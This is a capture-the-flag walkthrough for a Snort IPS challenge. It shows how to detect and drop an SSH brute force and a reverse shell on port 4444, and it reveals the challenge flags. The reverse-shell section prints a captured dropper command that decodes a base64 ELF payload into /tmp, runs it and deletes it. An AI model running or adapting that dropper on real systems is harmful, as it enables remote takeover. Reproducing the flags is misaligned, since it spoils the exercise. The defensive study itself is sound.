SNORT CHALLENGE (LIVE ATTACKS)
SCENARIO 1: BRUTE FORCE
Write a snort IPS rule that will stop an observed brute force attack to receive the flag.
#identify the system's interfaces
root@thm:~$ ifconfig
* eth0: 10.10.30.67
eth1: 10.234.0.1
#identify service ports
root@thm:~$ netstat -natup
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 786/Xtigervnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:49352 127.0.0.1:5901 ESTABLISHED -
tcp 0 0 10.10.30.67:80 10.100.1.146:45444 ESTABLISHED -
tcp 0 0 10.10.30.67:80 10.100.1.146:42256 ESTABLISHED -
tcp 0 0 127.0.0.1:5901 127.0.0.1:49352 ESTABLISHED 786/Xtigervnc
tcp 0 0 127.0.0.1:5901 127.0.0.1:49286 ESTABLISHED 786/Xtigervnc
tcp 0 0 127.0.0.1:49286 127.0.0.1:5901 ESTABLISHED -
#identify the interface where there is traffic
root@thm:~$ sudo snort -Xe -i eth1
* no traffic
root@thm:~$ sudo snort -Xe -i eth0
* w/ traffic
* ALT: sudo snort -Xe -i eth0:eth1
#run snort on sniffer mode & identify the attack source, service and port
#* a brute force attack often appears as a series of repeated connection
#* attempts to a specific service or port in a short period. These attempts
#* often originate from the same IP address or a set of IP addresses and are
#* aimed at guessing credentials.
root@thm:~$ sudo snort -Xev -A Full -l .
* -X Display the full packet details in HEX.
- The -X option implicitly includes -v and -d because it outputs the packet payload in a detailed format, including both hex and ASCII representations.
- The -e option is not covered by -X, as it specifically adds link-layer headers, which are not part of the payload dump.
* the -l option creates the logs in the specified directory
- the above example creates the logs in the 'current directory'
- the default output directory can be configured in the snort.conf file
- the default log directory is useful for continuous monitoring operations, and the "-l" parameter is much more useful for testing purposes.
* Use Case: Provides the most granular detail for packet inspection, including headers and payload, in both raw and human-readable formats.
root@thm:~$ CTRL+C
* stop the capture once enough traffic is acquired
root@thm:~$ ls
snort.log.1736382708
#perform analysis
root@thm:~$ sudo strings snort.log.1736384366
* port 80 traffic doesn't seem interesting
* port 22 traffic seems interesting
- SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4
root@dco:~$ sudo snort -r snort.log.1736384366 -X -d port 80
* nothing interesting
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
01/09-00:59:36.459070 10.10.245.36:46500 -> 10.10.140.29:22
TCP TTL:64 TOS:0x0 ID:17401 IpLen:20 DgmLen:948 DF
***AP*** Seq: 0x4172748E Ack: 0x99A57D7B Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 1884551896 4119659328
0x0000: 02 6D 84 B4 B4 1B 02 67 7A 27 40 23 08 00 45 00 .m.....gz'@#..E.
0x0010: 03 B4 43 F9 40 00 40 06 5D F5 0A 0A F5 24 0A 0A ..C.@.@.]....$..
0x0020: 8C 1D B5 A4 00 16 41 72 74 8E 99 A5 7D 7B 80 18 ......Art...}{..
0x0030: 01 EB B4 FB 00 00 01 01 08 0A 70 53 FA D8 F5 8D ..........pS....
0x0040: 03 40 00 00 03 7C 0B 14 18 F1 A2 5E 70 1B AA 46 .@...|.....^p..F
0x0050: DC CA D9 07 49 EA E5 3C 00 00 00 71 63 75 72 76 ....I..<...qcurv
0x0060: 65 32 35 35 31 39 2D 73 68 61 32 35 36 40 6C 69 e25519-sha256@li
0x0070: 62 73 73 68 2E 6F 72 67 2C 65 63 64 68 2D 73 68 bssh.org,ecdh-sh
0x0080: 61 32 2D 6E 69 73 74 70 32 35 36 2C 65 63 64 68 a2-nistp256,ecdh...
#filter the traffic to determine the rate of repeated connections
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22 | grep :22
01/09-00:59:27.138410 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.145530 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.158446 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.178475 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.185512 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.204390 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.222635 10.10.245.36:46474 -> 10.10.140.29:22
01/09-00:59:27.238635 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.258666 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.265190 10.10.140.29:22 -> 10.10.245.36:46470
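Added example, not part of the original notes: the grep above only lists packets, so this sketch turns the same Snort header lines into a per-source count of distinct client ports (one per new connection) toward the service port in each time window. The function names, the 10-second window and the threshold are assumptions; the sample input is the header lines from the grep output above, and only IPv4 header lines are handled.

```bash
#!/bin/sh
# Added example: measure connection-attempt rate from Snort header lines.

# Sample input: the ten header lines shown in the grep output above.
sample_lines() {
  cat <<'EOF'
01/09-00:59:27.138410 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.145530 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.158446 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.178475 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.185512 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.204390 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.222635 10.10.245.36:46474 -> 10.10.140.29:22
01/09-00:59:27.238635 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.258666 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.265190 10.10.140.29:22 -> 10.10.245.36:46470
EOF
}

# conn_rate PORT [WINDOW_SECONDS]
# Prints one line per window and source: "hh:mm:ss src_ip distinct_src_ports packets".
# Hex-dump and TCP option lines are ignored because their third field is not "->".
conn_rate() {
  awk -v port="$1" -v win="${2:-10}" '
    $3 == "->" && $1 ~ /^[0-9]+\/[0-9]+-/ {
      split($4, d, ":"); if (d[2] != port) next      # keep client -> service packets
      split($2, s, ":")                              # s[1] = source IP, s[2] = source port
      split($1, t, "[-:.]")                          # t[2..4] = hh, mm, ss
      bucket = int((t[2] * 3600 + t[3] * 60 + t[4]) / win) * win
      key = bucket SUBSEP s[1]
      pkts[key]++
      if (!((key, s[2]) in seen)) { seen[key, s[2]] = 1; ports[key]++ }
    }
    END {
      for (k in pkts) {
        split(k, p, SUBSEP)
        printf "%02d:%02d:%02d %s %d %d\n", int(p[1] / 3600), int(p[1] % 3600 / 60), p[1] % 60, p[2], ports[k], pkts[k]
      }
    }' | sort
}

# flag_sources PORT WINDOW THRESHOLD
# Prints sources that opened at least THRESHOLD distinct connections in any one window.
flag_sources() {
  conn_rate "$1" "$2" | awk -v th="$3" '$3 >= th { print $2 }' | sort -u
}

sample_lines | conn_rate 22 10
```

On the real capture the same functions read the reader output directly: sudo snort -r snort.log.1736384366 -X -d port 22 | conn_rate 22 10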
#write an IPS rule to detect the offending packet - this will identify potential brute force attack
#SSH brute force alert detection
#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
Search: flow
- https://docs.snort.org/rules/options/non_payload/flow?highlight=server#flow
#create a generic test rule to identify the offending packet
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
alert tcp any any <> any 22 (msg:"SSH Connection Attempt"; content:"SSH-"; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/rules/local.rules -r snort.log.1736384366 -A full -l .
root@thm:~$ ls
alert snort.log.1736384366 snort.log.1736386360
root@thm:~$ cat alert
[**] [1:1000001:1] SSH Connection Attempt [**]
#create a rule to drop the ssh brute force packets
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
drop tcp any 22 <> any any (msg:"SSH Connection Attempt"; content:"SSH-"; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/snort.conf -q -Q --daq afpacket -i eth0:eth1 -A full
* wait until a 'congratulations. you have successfully stopped the attack' msg pops up
* the Data Acquisition (DAQ) option activates snort as an IPS and uses the afpacket module
- snort ips mode requires at least TWO nics -i eth0:eth1
* this mode can also be activated by editing the snort.conf file
root@thm:~$ ls Desktop
flag.txt
root@thm:~$ cat flag.txt
THM{81b7fef657f8aaa6e4e200d616738254}
What is the name of the service under attack?
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
* ssh
What is the used protocol/port in the attack?
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
* tcp/22
SCENARIO 2: REVERSE SHELL
Write a snort IPS rule that will stop an observed reverse shell to receive the flag.
#identify the system's interfaces
root@thm:~$ ifconfig
* eth0: 10.10.27.124
eth1: 10.234.0.1
#identify service ports
root@thm:~$ netstat -natup
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 796/Xtigervnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 1 10.10.27.124:43854 185.125.188.54:443 SYN_SENT -
tcp 0 0 127.0.0.1:33814 127.0.0.1:5901 ESTABLISHED -
tcp 0 1 10.10.27.124:43850 185.125.188.54:443 SYN_SENT -
tcp 0 1 10.10.27.124:43852 185.125.188.54:443 SYN_SENT -
tcp 0 0 127.0.0.1:5901 127.0.0.1:33814 ESTABLISHED 796/Xtigervnc
tcp 0 1 10.10.27.124:42596 185.125.188.59:443 SYN_SENT -
tcp 0 0 10.10.27.124:80 10.100.1.217:41390 ESTABLISHED -
#identify the interface where there is traffic
root@thm:~$ sudo snort -Xev -i eth1
* no traffic
root@thm:~$ sudo snort -Xev -i eth0
* w/ traffic
* ALT: sudo snort -Xe -i eth0:eth1
#run snort on sniffer mode & identify the attack source, service and port
#* a brute force attack often appears as a series of repeated connection
#* attempts to a specific service or port in a short period. These attempts
#* often originate from the same IP address or a set of IP addresses and are
#* aimed at guessing credentials.
root@thm:~$ sudo snort -Xev -A Full -l .
* -X Display the full packet details in HEX.
- The -X option implicitly includes -v and -d because it outputs the packet payload in a detailed format, including both hex and ASCII representations.
- The -e option is not covered by -X, as it specifically adds link-layer headers, which are not part of the payload dump.
* the -l option creates the logs in the specified directory
- the above example creates the logs in the 'current directory'
- the default output directory can be configured in the snort.conf file
- the default log directory is useful for continuous monitoring operations, and the "-l" parameter is much more useful for testing purposes.
* Use Case: Provides the most granular detail for packet inspection, including headers and payload, in both raw and human-readable formats.
root@thm:~$ CTRL+C
* stop the capture once enough traffic is acquired
root@thm:~$ ls
snort.log.1736390738
#perform analysis
root@thm:~$ sudo strings snort.log.1736390738
echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgqQnGgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/NlsQY.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/anCTe' < '/tmp/NlsQY.b64' ; chmod +x '/tmp/anCTe' ; '/tmp/anCTe' & sleep 2 ; rm -f '/tmp/anCTe' ; rm -f '/tmp/NlsQY.b64';echo YRvcrcHrawxdWniMfQcmGDlLBKRtSQpQ
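Added example, not part of the original notes: strings output from a busy capture is long, so this sketch scores each cleartext line for the traits the command above combines (an embedded base64 run, a decode step, a write into a temp directory, chmod +x, self-cleanup) and prints only lines that stack several of them. The function names, the trait list and the minimum score are assumptions; the sample lines are constructed with a placeholder blob.

```bash
#!/bin/sh
# Added example: triage cleartext lines for staged-dropper traits.

# Constructed sample input; the blob is a harmless placeholder, not a payload.
sample_strings() {
  blob=$(awk 'BEGIN { for (i = 0; i < 40; i++) printf "QUFB" }')
  printf '%s\n' "GET /index.html HTTP/1.1"
  printf '%s\n' "echo -n ${blob}>>'/tmp/PLACEHOLDER.b64' ; base64 -d - > '/tmp/PLACEHOLDER' < '/tmp/PLACEHOLDER.b64' ; chmod +x '/tmp/PLACEHOLDER' ; rm -f '/tmp/PLACEHOLDER.b64'"
  printf '%s\n' "chmod +x deploy.sh"
}

# stager_score [MIN_SCORE]
# Reads lines on stdin, prints "score<TAB>line_number" for lines scoring >= MIN_SCORE.
stager_score() {
  awk -v min="${1:-3}" '
    {
      score = 0
      # decodes an embedded blob
      if ($0 ~ /base64 (-d|--decode)|decode_base64|b64decode|openssl enc -d/) score++
      # redirects output into a world-writable directory
      if ($0 ~ />+ *.?\/(tmp|var\/tmp|dev\/shm)\//) score++
      # marks a file executable
      if ($0 ~ /chmod \+x/) score++
      # removes its own artefacts afterwards
      if ($0 ~ /rm -f/) score++
      # contains a base64-looking run of 100 or more characters
      n = split($0, f, "[^A-Za-z0-9+/=]+")
      for (i = 1; i <= n; i++) if (length(f[i]) >= 100) { score++; break }
      if (score >= min) print score "\t" NR
    }'
}

sample_strings | stager_score 3
```

On the real capture: sudo strings snort.log.1736390738 | stager_score 3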
root@dco:~$ sudo snort -r snort.log.1736390738 -X
01/09-02:45:58.220551 10.10.196.55:54156 -> 10.10.144.156:4444
TCP TTL:64 TOS:0x0 ID:6728 IpLen:20 DgmLen:134 DF
***AP*** Seq: 0xBCF7B318 Ack: 0x50ED995F Win: 0x1E5 TcpLen: 32
TCP Options (3) => NOP NOP TS: 2358867399 1981035098
0x0000: 02 15 8B 5C 4F EF 02 7C 9A 93 DF DD 08 00 45 00 ...\O..|......E.
0x0010: 00 86 1A 48 40 00 40 06 B7 42 0A 0A C4 37 0A 0A ...H@.@..B...7..
0x0020: 90 9C D3 8C 11 5C BC F7 B3 18 50 ED 99 5F 80 18 .....\....P.._..
0x0030: 01 E5 69 60 00 00 01 01 08 0A 8C 99 75 C7 76 14 ..i`........u.v.
0x0040: 32 5A 1B 5D 30 3B 75 62 75 6E 74 75 40 69 70 2D 2Z.]0;ubuntu@ip-
0x0050: 31 30 2D 31 30 2D 31 39 36 2D 35 35 3A 20 7E 07 10-10-196-55: ~.
0x0060: 1B 5B 30 31 3B 33 32 6D 75 62 75 6E 74 75 40 69 .[01;32mubuntu@i
0x0070: 70 2D 31 30 2D 31 30 2D 31 39 36 2D 35 35 1B 5B p-10-10-196-55.[
0x0080: 30 30 6D 3A 1B 5B 30 31 3B 33 34 6D 7E 1B 5B 30 00m:.[01;34m~.[0
0x0090: 30 6D 24 20 0m$
* port 4444 is a known default metasploit listening port
root@thm:~$ sudo snort -r snort.log.1736390738 -X -d port 4444
01/09-02:45:57.803324 10.10.196.55:54156 -> 10.10.144.156:4444
TCP TTL:64 TOS:0x0 ID:6721 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBCF7AEBF Ack: 0x50ED9632 Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 2358859827 1981027526
0x0000: 02 15 8B 5C 4F EF 02 7C 9A 93 DF DD 08 00 45 00 ...\O..|......E.
0x0010: 00 E4 1A 41 40 00 40 06 B6 EB 0A 0A C4 37 0A 0A ...A@.@......7..
0x0020: 90 9C D3 8C 11 5C BC F7 AE BF 50 ED 96 32 80 18 .....\....P..2..
0x0030: 01 EB 69 BE 00 00 01 01 08 0A 8C 99 58 33 76 14 ..i.........X3v.
0x0040: 14 C6 75 6E 61 6D 65 20 2D 6D 73 3B 65 63 68 6F ..uname -ms;echo
0x0050: 20 4A 59 48 56 65 46 4A 51 67 6F 72 55 52 70 64 JYHVeFJQgorURpd
0x0060: 73 74 51 6B 4E 56 74 6E 50 7A 4F 41 6C 78 61 64 stQkNVtnPzOAlxad
0x0070: 62 0A 4C 69 6E 75 78 20 78 38 36 5F 36 34 0A 4A b.Linux x86_64.J
0x0080: 59 48 56 65 46 4A 51 67 6F 72 55 52 70 64 73 74 YHVeFJQgorURpdst
0x0090: 51 6B 4E 56 74 6E 50 7A 4F 41 6C 78 61 64 62 0A QkNVtnPzOAlxadb.
0x00A0: 1B 5D 30 3B 75 62 75 6E 74 75 40 69 70 2D 31 30 .]0;ubuntu@ip-10
0x00B0: 2D 31 30 2D 31 39 36 2D 35 35 3A 20 7E 07 1B 5B -10-196-55: ~..[
0x00C0: 30 31 3B 33 32 6D 75 62 75 6E 74 75 40 69 70 2D 01;32mubuntu@ip-
0x00D0: 31 30 2D 31 30 2D 31 39 36 2D 35 35 1B 5B 30 30 10-10-196-55.[00
0x00E0: 6D 3A 1B 5B 30 31 3B 33 34 6D 7E 1B 5B 30 30 6D m:.[01;34m~.[00m
0x00F0: 24 20 $
#filter the traffic to determine the rate of repeated connections
root@thm:~$ sudo snort -r snort.log.1736390738 -X -d port 4444 | grep :4444
01/09-02:45:53.483068 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.483078 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563507 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.563532 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563541 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563550 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.563559 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.564050 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.574576 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.585139 10.10.144.156:4444 -> 10.10.196.55:54156
#write an IPS rule to detect the offending packet - this will identify potential attack
#reverse shell alert detection
#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
Search: flow
- https://docs.snort.org/rules/options/non_payload/flow?highlight=server#flow
#create a generic test rule to identify the offending packet
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
alert tcp any 4444 <> any any (msg:"Potential Reverse Shell on Known Metasploit Port"; flow:established; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/rules/local.rules -r snort.log.1736390738 -A full -l .
root@thm:~$ ls
alert snort.log.1736384366 snort.log.1736386360
root@thm:~$ cat alert
[**] [1:1000001:1] Potential Reverse Shell on Known Metasploit Port [**]
[Priority: 0]
01/09-02:45:58.283339 10.10.144.156:4444 -> 10.10.196.55:54156
TCP TTL:64 TOS:0x0 ID:64573 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x50ED9960 Ack: 0xBCF7B36B Win: 0x1E2 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1981035162 2358867417
#create a rule to drop the reverse shell packets
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
drop tcp any 4444 <> any any (msg:"Potential Reverse Shell on Known Metasploit Port"; flow:established; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/snort.conf -q -Q --daq afpacket -i eth0:eth1 -A full
* wait until a 'congratulations. you have successfully stopped the attack' msg pops up
* the Data Acquisition (DAQ) option activates snort as an IPS and uses the afpacket module
- snort ips mode requires at least TWO nics -i eth0:eth1
* this mode can also be activated by editing the snort.conf file
root@thm:~$ ls Desktop
flag.txt
root@thm:~$ cat flag.txt
THM{0ead8c494861079b1b74ec2380d2cd24}
What is the used protocol/port in the attack?
root@dco:~$ sudo snort -r snort.log.1736390738 -X
* tcp/4444